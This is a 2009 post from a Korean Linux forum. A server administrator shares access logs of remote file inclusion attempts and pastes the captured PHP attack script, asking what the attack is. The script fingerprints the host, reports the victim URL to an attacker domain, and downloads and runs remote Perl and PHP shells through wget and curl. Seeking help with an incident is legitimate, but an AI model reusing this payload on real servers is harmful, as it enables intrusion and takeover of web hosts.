2024년 12월 22일 일요일
총 회원: 20,028명
Today Join: 0명
지역 모임 게시판 : [대구지역] , [서울지역]
한국LUG 전체 게시판 목록 & 바로가기 Android Platform
c/c++
cubrid
대구지역 모임
프로그래밍 개발자 & 개발 의뢰 & 구인
GTK
JAVA
MySQL
PHP
Python
Qt
서울지역 모임
WINDOWS
하이브리드의 허접 윈도우즈 프로그래밍 강좌
CentOS 리눅스구축관리실무 도서
김태용의 gcc와 C++ 기초 입문 - gcc와 wxWidgets
LUG 자료실 - 유익한 문서/글 작성, 자료실
임베디드 전문가 게시판 - 박계현님
JSP And JAVA 입문
Rewritable Live Disc[myPdisc]
뉴스 게시판
한국LUG 공지사항
설문/토론 이슈 게시판
비즈니스 제품 소개[Soft/HardWare etc.]
한국LUG, IT관련 공유일정
보안 전문가 게시판 - 안성범님
팝니다/삽니다 or 물물교환
김태용의 리눅스 쉘 스크립트 프로그래밍 입문
리눅스 스크린샷/바탕화면/테마/아이콘/사진
토크박스 - 자유게시판/가입인사
소프트웨어, 하드웨어 사용기
Ubiquitous Sensor Network - 정원도님
김태용의 C 언어 프로그래밍 입문
한국LUG 전광판 광고게시판
리눅스 데탑/서버/프로그래밍 지식인QA
제1회, 제2회 한국LUG 세미나
제10회 한국LUG 세미나
제11회 한국LUG 세미나
제12회 한국LUG 세미나
제13회 한국LUG 세미나
제14회 한국LUG 세미나
제4회 한국LUG 세미나
제5회 한국LUG 세미나
제6회 한국LUG 세미나
제7회 한국LUG 세미나
제8회 한국LUG 세미나
제9회 한국LUG 세미나
제15회 한국LUG 세미나
제16회 한국LUG 세미나
제3회 한국LUG 세미나
[김성지] 개인 게시판
[전수근] 개인 게시판
[정경호] 개인 게시판
[박건희] 개인 게시판
[김태용] 개인게시판
[우성창] 개인 게시판
[박찬흠] 개인 게시판
[허진형] 개인 게시판
[보안로그인 인증서설치]
[회원 이메일 재인증하기]
MY IP : 18.227.140.152
◆ LUG 세미나 자료
세미나 게시판 바로가기
15회 세미나
14회 세미나
13회 세미나
12회 세미나
11회 세미나
10회 세미나
9회 세미나
8회 세미나
7회 세미나
6회 세미나
5회 세미나
4회 세미나
3회 세미나
1회~2회 세미나
◆ 개발자 게시판 링크
개발자 게시판 바로가기
Android
C/C++ [gcc/g++]
Python
GTK
Qt
JAVA
PHP
CUBRID
MySQL
Windows
개발자 & 의뢰
파이썬 강좌
◆ Sponsor
◆ LUG 접속자 수(IP 수)
최대 : 32,564
전체 : 4,496,144
Will be Prosumer's Revolution and Technical Revolution in the Future!
Linux User/Developer is also Windows User/Developer... Cross Platform Engineer...
"21C 공학인을 대통령, 국회의원으로 만들자!"
"더욱 더 많은 동지분들이 공학제국 건설에 동참할 수 있도록 널리 알려주세요~" [ F = m * a ]
과학기술/공학인이 대한민국 국회 의석의 50% 이상을 확보하는 그날을 위하여~ ^___^
한국리눅스유저그룹 Home ▶ 리눅스 데탑/서버/프로그래밍 지식인QA
[ 질문시 유의사항 ]
무조건 검색부터 하자.
질문하기전에 반드시 해당 프로그램의 사이트에 가서 readme, help, install 관련 문서를 무조건 읽어보자.
컴퓨터와 놀기 위해서 영어공부는 필수다. (영문자와 숫자 오타에 대해 항상 조심하고, 재확인 필수!)
C/C++언어, Python언어, Shell Script 는 필수이므로 책을 구해서 열공하자.
답변하시는분들을 위하여 자세하게 기술하고, 답변하시는분에게 감사의 코멘트를 남기자.
배포판 이름, 서버 사양등의 내용도 적자.
자세한 내용이 없으면 아무런 답변 코멘트도 없다.
답변이 없으면 혼자라도 공부해서 유익한 글을 포스팅하자. 영문번역이라도 하자.
소인 [小人], 잡배는 되지 말자. 관리자가 코멘트할 경우에는 공부 방법만 제시할 것이다.
[LINUX] 얼마전 서버가 공격을 당한거 같습니다.
글쓴이 : 신화준 [PO : 98]
날짜 : 09-12-17 13:21
조회 : 31955
포인트 : 200점
태그 : PHP스크립트공격,공격
웹서버 로그를 분석한 결과 210.182.70.166 - - [14/Dec/2009:09:40:17 +0900] "GET /images/new/main/2009_main/quick.gif HTTP/1.1" 200 21661 210.182.70.166 - - [14/Dec/2009:09:40:17 +0900] "GET /images/new/main/2009_main/bg_succ.gif HTTP/1.1" 200 6719 210.182.70.166 - - [14/Dec/2009:09:40:17 +0900] "GET /images/new/main/2009_main/internetExplorer7_down.gif HTTP/1.1" 200 9630 210.182.70.166 - - [14/Dec/2009:09:40:17 +0900] "GET /images/new/main/2009_main/daily_top.gif HTTP/1.1" 200 4490 210.182.70.166 - - [14/Dec/2009:09:40:17 +0900] "GET /images/new/main/2009_main/bg_photo.gif HTTP/1.1" 200 786 210.182.70.166 - - [14/Dec/2009:09:40:16 +0900] "GET /new/images/swf/menu.swf HTTP/1.1" 200 324295 210.182.70.166 - - [14/Dec/2009:09:40:18 +0900] "GET /images/new/main/2009_main/tab_03_ov.gif HTTP/1.1" 200 2424 210.182.70.166 - - [14/Dec/2009:09:40:17 +0900] "GET /new/images/swf/hunjangtown2.flv HTTP/1.1" 200 17587484 ::1 - - [14/Dec/2009:09:40:25 +0900] "GET / HTTP/1.0" 200 107 210.182.70.166 - - [14/Dec/2009:09:42:54 +0900] "POST /new/member/prc_auth.php HTTP/1.1" 200 83 210.182.70.166 - - [14/Dec/2009:09:42:54 +0900] "GET /new/ HTTP/1.1" 200 24638 210.182.70.166 - - [14/Dec/2009:09:42:54 +0900] "GET /images/new/main/2009_main/btn_logout.gif HTTP/1.1" 200 210 210.182.70.166 - - [14/Dec/2009:09:42:54 +0900] "GET /images/new/btn/membergovernment.gif HTTP/1.1" 200 400 210.182.70.166 - - [14/Dec/2009:09:42:54 +0900] "GET /images/new/btn/campusgovernment.gif HTTP/1.1" 200 393 210.182.70.166 - - [14/Dec/2009:09:42:55 +0900] "GET /images/new/main/2009_main/tab_02_ov.gif HTTP/1.1" 200 1722 210.182.70.166 - - [14/Dec/2009:09:43:12 +0900] "GET /images/new/main/2009_main/tab_01_ov.gif HTTP/1.1" 200 1420 210.182.70.166 - - [14/Dec/2009:09:43:12 +0900] "GET /images/new/main/2009_main/tab_03_ov.gif HTTP/1.1" 200 2424 122.201.81.160 - - [14/Dec/2009:09:45:44 +0900] "GET /home.php?inc=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 608 66.249.65.129 - - [14/Dec/2009:09:47:07 +0900] "GET /new/english/lst_pubinfo_.php?menuno=4&page=2&keyfield=&key= HTTP/1.1" 200 20293 122.201.81.160 - - [14/Dec/2009:10:00:10 +0900] "GET /home.php?ln=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 403 210 121.146.37.56 - - [14/Dec/2009:10:05:08 +0900] "GET /new/ HTTP/1.1" 403 206 121.146.37.56 - - [14/Dec/2009:10:05:10 +0900] "GET /new/ HTTP/1.1" 403 206 121.146.37.56 - - [14/Dec/2009:10:05:16 +0900] "GET / HTTP/1.1" 403 202 121.146.37.56 - - [14/Dec/2009:10:05:18 +0900] "GET / HTTP/1.1" 403 202 121.146.37.56 - - [14/Dec/2009:10:06:01 +0900] "GET / HTTP/1.1" 403 202 121.146.37.56 - - [14/Dec/2009:10:06:04 +0900] "GET / HTTP/1.1" 403 202 121.146.37.56 - - [14/Dec/2009:10:06:05 +0900] "GET / HTTP/1.1" 403 202 121.146.37.56 - - [14/Dec/2009:10:06:07 +0900] "GET / HTTP/1.1" 403 202 121.146.37.56 - - [14/Dec/2009:10:06:09 +0900] "GET / HTTP/1.1" 403 202 121.146.37.56 - - [14/Dec/2009:10:06:11 +0900] "GET / HTTP/1.1" 403 202 121.146.37.56 - - [14/Dec/2009:10:15:14 +0900] "GET /new/ HTTP/1.1" 403 206 121.146.37.56 - - [14/Dec/2009:10:15:24 +0900] "GET /new/ HTTP/1.1" 403 206 121.146.37.56 - - [14/Dec/2009:10:15:30 +0900] "GET /new/ HTTP/1.1" 403 206 121.146.37.56 - - [14/Dec/2009:10:15:36 +0900] "GET /new/ HTTP/1.1" 403 206 121.146.37.56 - - [14/Dec/2009:10:15:41 +0900] "GET /new/ HTTP/1.1" 403 206
특정요청 이후에 웹서비스 요청시 403 에러가 나옴 아래는 # http://peirano.com.ar/hbb.txt?&mode=id 캡쳐한 내용 '); @ini_restore('safe_mode');@ini_set('default_socket_timeout', 2);@error_reporting(0);@set_time_limit(0);@ignore_user_abort(); $modez = $_GET["mode"]; $url = "http://peirano.com.ar/ "; switch ($modez) { case "pb": include($url.'pbot.txt'); break; case "log": @file($url.'safe.php?rfi='.base64_encode($_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'])); break; case "shb": echo fx29exec('cd /tmp;wget '.$url.'tmp.txt'); echo fx29exec('cd /tmp;curl -o tmp.txt '.$url.'tmp.txt'); echo fx29exec('cd /tmp;/usr/bin/perl tmp.txt'); echo fx29exec('cd /tmp;rm -rf tmp.txt*'); break; case "wp": echo fx29exec('wget -o node.php http://nlsecurity.org/iQ/iQ.txt' ); echo fx29exec('curl -o node.php http://nlsecurity.org/iQ/iQ.txt' ); echo fx29exec('fetch -o node.php http://nlsecurity.org/iQ/iQ.txt' ); echo fx29exec('lynx -source http://nlsecurity.org/iQ/iQ.txt > node.php '); echo fx29exec('GET http://nlsecurity.org/iQ/iQ.txt > node.php'); break; case "id": $P = @getcwd(); $IP = @getenv("SERVER_ADDR"); $UID = fx29exec("id"); fx("SAFE",@safemode()?"ON":"OFF"); fx("OS",@PHP_OS); fx("UNAME",@php_uname()); fx("SERVER",($IP)?$IP:"-"); fx("USER",@get_current_user()); fx("UID",($UID)?$UID:"uid=".@getmyuid ()." gid=".@getmygid ()); fx("DIR",$P); fx("PERM",(@is_writable($P))?"[W]":"[R]"); fx("HDD","Used: ".hdd("used")." Free: ".hdd("free")." Total: ".hdd("total")); fx("DISFUNC",@getdisfunc()); break; } function fx($t,$c) { echo "$t: "; echo (is_array($c))?join(" ",$c):$c; echo " "; } function safemode() { return (@ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) ? TRUE : FALSE; } function getdisfunc() { $rez = explode(",",@ini_get("disable_functions")); return (!empty($rez))?$rez:array(); } function enabled($func) { return (function_exists($func) && is_callable($func) && !in_array($func,getdisfunc())) ? TRUE : FALSE; } function fx29exec($cmd) { if (enabled("exec")) { exec($cmd,$o); $rez = join("\r\n",$o); } elseif (enabled("shell_exec")) { $rez = shell_exec($cmd); } elseif (enabled("system")) { @ob_start(); @system($cmd); $rez = @ob_get_contents(); @ob_end_clean(); } elseif (enabled("passthru")) { @ob_start(); passthru($cmd); $rez = @ob_get_contents(); @ob_end_clean(); } elseif (enabled("popen") && is_resource($h = popen($cmd.' 2>&1', 'r')) ) { while ( !feof($h) ) { $rez .= fread($h, 2096); } pclose($h); } else { $rez = "Error!"; } return $rez; } function vsize($size) { if (!is_numeric($size)) { return FALSE; } else { if ( $size >= 1073741824 ) { $size = round($size/1073741824*100)/100 ." GB"; } elseif ( $size >= 1048576 ) { $size = round($size/1048576*100)/100 ." MB"; } elseif ( $size >= 1024 ) { $size = round($size/1024*100)/100 ." KB"; } else { $size = $size . " B"; } return $size; } } function hdd($type) { $P = @getcwd(); $T = @disk_total_space($P); $F = @disk_free_space($P); $U = $T - $U; $hddspace = array("total" => vsize($T), "free" => vsize($F), "used" => vsize($U)); return $hddspace[$type]; } @die(base64_decode('Qi5PLlYgU2llbmNlIDIwMDk=')); ?> PHP로 만들어진 스크립트인데요. 이게 어떤 공격일까요, 증상으로는 웹서비스 Document_root 가 권한이 바뀌었고, FTP 서비스가 불가능해졌습니다.
눈팅만으로는 답변글을 볼 수 없습니다. 로그인하셔야 합니다.
[한국리눅스유저그룹]의 글을 퍼가실때에는 반드시 [출처]를 표시해 주시는 센스가 필요합니다!
지금 이시간, 공부하고 있는 당신은 머지않아 최고가 될 것입니다. 즐겁게 공부하시고, 힘내십시오!
포스팅 글이 유용하셨다면 RSS를 구독하시면 됩니다.
유용하고, 좋은글 포스팅 바랍니다. 포스팅된 글은 (전세계)? 대부분의 소셜 사이트에 포스팅됩니다.
Remember GIVE First and then TAKE After!
[포인트 정책] :: 글읽기 : -10점(글쓴이는 포인트 받음), 글쓰기 : +0점, 코멘트 : +10점, 다운로드 : -200점
질문시 200점이상의 포인트 투자가 필요, 답변이 채택되면 70%의 포인트 받음
총조회수 : 13,875,268회 | 전체글 : 3,600건 | 질문글 : 860건 | 코멘트 답변글 : 2,740건
한국LUG는 대한민국의 리눅스 지식인[사용자/개발자]들의 커뮤니티입니다. [매년 1~2회의 공개세미나 개최]
한국LUG :
울산
- 광주
- 전북
- 인천
- 대전
- LUG 위키
[Linux Distribution] :
CentOS |
Ubuntu |
Fedora |
WhiteBox |
Debian |
Slackware |
Gentoo |
openSuSE
"Linux" is a registered trademark of Linus Torvalds. "Linux is Kernel"
- 리눅스는 공짜가 아니라 자유[Free & Effort]입니다 -
[인터넷 서점/출판사 링크] : 강컴 | 알라딘 | 인터파크 | 예스24 | 교보문고 | 수퍼유저코리아 | 제이펍
한국LUG 사이트는 1024 x 768 해상도(운영자 노트북:14")에 최적화 되어 있습니다. : LINUX FANSITE
WWW.LUG.OR.KR Server is made by CentOS Linux, P4 1.8G, Memory 512MB, Main HDD 160GB, Backup HDD 40GB and LAMP, qmail MTA.
CentOS Linux & Mozilla Firefox UTF-8 Base Created.
1998-2024 www.lug.or.kr Directed By Great Dragon, Kim.
Top
LUG 포인트 정책 : [회원가입 : +100점] [로그인(하루한번) : +100점] [글쓰기 : +20점] [코멘트 : +10점] [다운로드 : -200점] [질문 포인트 : 최소 200점]
데스크탑 프로그래밍(gcc, g++, wxGTK[wxWidgets] 등)은 "Fedora"를 사용하고, 서버 운영(WEB, FTP 등)은 "CentOS"를 사용하시길 권장합니다.
도전하는자, 자신을 투자하는자만이 뜻하는바를 이룰 수 있다.
Information should be Exchanged with Interactive, not One Way Direction.
준회원,
정회원,
우수회원,
VIP회원,
기업회원,
관리자
Be Maker!
인생에서, 100% 순이익을 보장하는건 없다. 1%의 지식을 나눔으로써, 가끔씩 손해볼 필요도 있다.
그대가 가진 1%의 지식만이라도 공공을 위해 포스팅하라. 손해본다는 생각이 앞선다면 그대의 인생은 힘들어질것이다.
자신이 가진 지식의 1%도 투자하지 않고, 오로지 자신의 이익만 탐하는자와는 동지가 되지마라.
만나서 대화하면 모두 좋은 사람들이지만, 유독 인터넷에서만 자신을 밝히지 않고, 좀비로 서식하는 사람들이 많다.
부지불식간[不知不識間], 좀비(하류) 인생이 될지도 모르니, 항상 자신을 경계하도록 하라.